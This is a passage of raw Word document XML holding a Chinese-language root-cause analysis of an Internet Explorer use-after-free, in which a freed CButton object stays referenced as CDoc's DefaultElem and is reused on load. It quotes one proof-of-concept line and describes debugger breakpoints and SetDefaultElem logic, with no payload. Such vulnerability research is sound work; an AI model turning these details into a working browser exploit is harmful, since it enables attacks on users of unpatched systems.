      <w:r w:rsidR="00D51F9F">
        <w:t>Node</w:t>
      </w:r>
      <w:r w:rsidR="00D51F9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:p w:rsidR="000E6689" w:rsidRDefault="000E6689" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00807DDD" wp14:editId="390E770F">
            <wp:extent cx="4876190" cy="194285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CB" w:rsidRDefault="00D326CB" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="OLE_LINK37"/>
      <w:bookmarkStart w:id="37" w:name="OLE_LINK38"/>
      <w:r w:rsidRPr="00D326CB">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CollectGarbage()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后元素被释放：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkEnd w:id="37"/>
    <w:p w:rsidR="00D326CB" w:rsidRDefault="00E26B37" w:rsidP="00CE6393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4C7EACF" wp14:editId="1B07A150">
            <wp:extent cx="6645910" cy="49117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88" w:rsidRDefault="00022162" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="OLE_LINK39"/>
      <w:bookmarkStart w:id="39" w:name="OLE_LINK40"/>
      <w:r w:rsidRPr="00022162">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r w:rsidRPr="00022162">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CollectGarbage()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后只有</w:t>
      </w:r>
      <w:r w:rsidR="00CE417E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00CE417E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="00036488">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidR="00CE417E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被释放了</w:t>
      </w:r>
      <w:r w:rsidR="00036488">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果把poc中的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00022162" w:rsidRDefault="00036488" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036488">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e2.appendChild(document.createElement('body'));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注释掉，会发现</w:t>
      </w:r>
      <w:r w:rsidR="00291597">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00291597">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="00291597">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象也不会被释放</w:t>
      </w:r>
      <w:r w:rsidR="00BA1224">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，同时ie也不会crash</w:t>
      </w:r>
      <w:r w:rsidR="00291597">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00291597" w:rsidRPr="00F862AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因此是在</w:t>
      </w:r>
      <w:r w:rsidR="00291597" w:rsidRPr="00F862AA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e2.appendChild(document.createElement('body'))</w:t>
      </w:r>
      <w:r w:rsidR="00F5545C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidR="004C40AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidR="00C9786E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>释放</w:t>
      </w:r>
      <w:r w:rsidR="00D94F96">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CButton</w:t>
      </w:r>
      <w:r w:rsidR="004C40AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内存</w:t>
      </w:r>
      <w:r w:rsidR="000A440A" w:rsidRPr="003A33AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkEnd w:id="39"/>
    <w:p w:rsidR="000A440A" w:rsidRDefault="000A440A" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C2069" w:rsidRPr="00B373FF" w:rsidRDefault="005C2069" w:rsidP="005C2069">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="OLE_LINK41"/>
      <w:bookmarkStart w:id="41" w:name="OLE_LINK42"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00B373FF">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A4F56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00ED6DEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本质</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00952B72" w:rsidRDefault="007F0065" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过前面的分析可以知道在</w:t>
      </w:r>
      <w:r w:rsidRPr="00022162">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CollectGarbage()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象会被释放的，但是On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>事件依然会从C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Doc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0065">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidRPr="007F0065">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成员变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>取出该C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象，</w:t>
      </w:r>
      <w:r w:rsidR="00B552DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下面跟踪C</w:t>
      </w:r>
      <w:r w:rsidR="00B552DC">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="00B552DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象是什么时候赋值给C</w:t>
      </w:r>
      <w:r w:rsidR="00B552DC">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Doc</w:t>
      </w:r>
      <w:r w:rsidR="00B552DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidR="00B552DC" w:rsidRPr="007F0065">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="00B552DC" w:rsidRPr="007F0065">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成员变量</w:t>
      </w:r>
      <w:r w:rsidR="00B552DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030627F" w:rsidRDefault="00A00124" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先观察CDoc对象</w:t>
      </w:r>
      <w:r w:rsidR="00C30919">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在mshtm</w:t>
      </w:r>
      <w:r w:rsidR="00C30919">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>l!CE</w:t>
      </w:r>
      <w:r w:rsidR="00C30919">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lement</w:t>
      </w:r>
      <w:r w:rsidR="00C30919">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>::Doc()</w:t>
      </w:r>
      <w:r w:rsidR="00EB5AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r w:rsidR="0074131B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下断点：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkEnd w:id="41"/>
    <w:p w:rsidR="00B7295E" w:rsidRDefault="00F65D99" w:rsidP="00CE639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6FBB700" wp14:editId="1370A7D2">
            <wp:extent cx="6645910" cy="3575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68" w:rsidRDefault="00AB7AF3" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="OLE_LINK43"/>
      <w:bookmarkStart w:id="43" w:name="OLE_LINK44"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此时De</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>faultElem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>还是空，对这个地址下写断点：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkEnd w:id="43"/>
    <w:p w:rsidR="00AB7AF3" w:rsidRDefault="00872266" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E3AE9F2" wp14:editId="10A7726A">
            <wp:extent cx="6645910" cy="3451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8E" w:rsidRDefault="003E4B06" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="OLE_LINK45"/>
      <w:bookmarkStart w:id="45" w:name="OLE_LINK46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看到在</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将C</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>挂到DOM树上时会调用</w:t>
      </w:r>
      <w:r w:rsidR="001744B5" w:rsidRPr="001744B5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CButton::Notify</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="001744B5" w:rsidRPr="001744B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001744B5" w:rsidRPr="001744B5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::SetDefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将C</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象设置为CDoc的</w:t>
      </w:r>
      <w:r w:rsidR="001744B5" w:rsidRPr="001744B5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，而当CButton对象被删除后CDoc的</w:t>
      </w:r>
      <w:r w:rsidR="001744B5" w:rsidRPr="001744B5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>仍然保存了CButton对象的引用，最终在</w:t>
      </w:r>
      <w:r w:rsidR="001744B5" w:rsidRPr="001744B5">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMarkup::OnLoadStatusDone</w:t>
      </w:r>
      <w:r w:rsidR="001744B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时再次引用了该地址，造成UAF漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00011689" w:rsidRDefault="00555BDB" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以漏洞来源于</w:t>
      </w:r>
      <w:r w:rsidRPr="00555BDB">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::SetDefaultElem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数，跟入这个函数分析下</w:t>
      </w:r>
      <w:r w:rsidR="00011689">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>逻辑</w:t>
      </w:r>
      <w:r w:rsidR="002849C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkEnd w:id="45"/>
    <w:p w:rsidR="007E688E" w:rsidRDefault="000F6150" w:rsidP="00CE639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78EC59B" wp14:editId="7D16349D">
            <wp:extent cx="6645910" cy="3696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D1" w:rsidRDefault="007C5247" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="OLE_LINK47"/>
      <w:bookmarkStart w:id="47" w:name="OLE_LINK48"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该函数有两个参数：this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标志。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C5247" w:rsidRDefault="007C5247" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先通过</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5247">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::GetParentForm(this)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>取出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前element的</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5247">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ParentForm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象，如果存在则将parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象+0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的指针赋值给default_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果不存在parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象则取出</w:t>
      </w:r>
      <w:r w:rsidR="00E82E35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Doc对象+0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1A8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的指针赋值给default_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E3294F" w:rsidRDefault="003A5894" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5894">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后判断</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69" w:rsidRPr="00555BDB">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::SetDefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否时元素释放时调用的</w:t>
      </w:r>
      <w:r w:rsidR="00DA62F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（0</w:t>
      </w:r>
      <w:r w:rsidR="00DA62F9">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r w:rsidR="00DA62F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00DA62F9">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s_element</w:t>
      </w:r>
      <w:r w:rsidR="00DA62F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果是则判断default_</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和this</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_element</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否相等，不等则将default_</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>置0，否则通过</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69" w:rsidRPr="00DB2B69">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::FindDefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69" w:rsidRPr="00DB2B69">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DefaultElem</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并赋值给default_</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r w:rsidR="00DB2B69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2B69" w:rsidRDefault="00DC2628" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00555BDB">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::SetDefaultElem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不是元素释放时调用的</w:t>
      </w:r>
      <w:r w:rsidR="004640F5">
        <w:rPr>
